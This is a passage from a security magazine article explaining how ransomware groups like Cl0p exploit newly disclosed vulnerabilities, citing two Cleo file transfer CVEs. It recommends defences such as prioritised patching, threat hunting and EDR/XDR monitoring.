infographic
• The vulnerabilities have high-risk scores( CVSS).
• The vulnerabilities allow attackers to remotely take control of a system( RCE).
• The vulnerabilities affect software that’ s accessible from the Internet.
• An exploit developer or malicious actor has already published the proof of concept( PoC) for the exploitation process.
In less than 24 hours of the vulnerability’ s public disclosure, threat actors launch automated scanners that scan the Internet and establish remote access to vulnerable systems. After this initial access blitz comes the second stage of the attack – the manual hacking of the victims. This second stage takes time.
Attackers need to figure out which systems are worth their effort, and then they have to manually hack their way deeper, typically using living off the land techniques to evade detection. This delay means the actual ransomware attack or data theft typically happens weeks or even months later.
In Cl0p’ s case, Bitdefender’ s analysis points to their exploitation of two recent vulnerabilities in Cleo file transfer software, CVE-2024-50623 and CVE-2024-55956. These vulnerabilities, rated 9.8 out of 10 in severity, allowed attackers to run commands on vulnerable systems. Even though these vulnerabilities were revealed in October and December 2024, the manual part of the attack is what takes time, which can explain why we are seeing these victims now.
Here are a few key defences that can make a significant difference:
• Smart Patching: Prioritise patches for actively exploited vulnerabilities and maintain awareness of known exploits( CISA KEV catalogue). A flexible patching strategy is key to rapid response.
• Threat Hunting: Proactively search your network for hidden threats. Discover backdoors before attackers launch their main attack.
• EDR / XDR with SOC / MDR: Use advanced detection systems( EDR / XDR) and expert analysis( SOC / MDR) to detect attackers moving within your network( lateral movement) and stop them before they reach critical data.
WWW. INTELLIGENTCISO. COM 23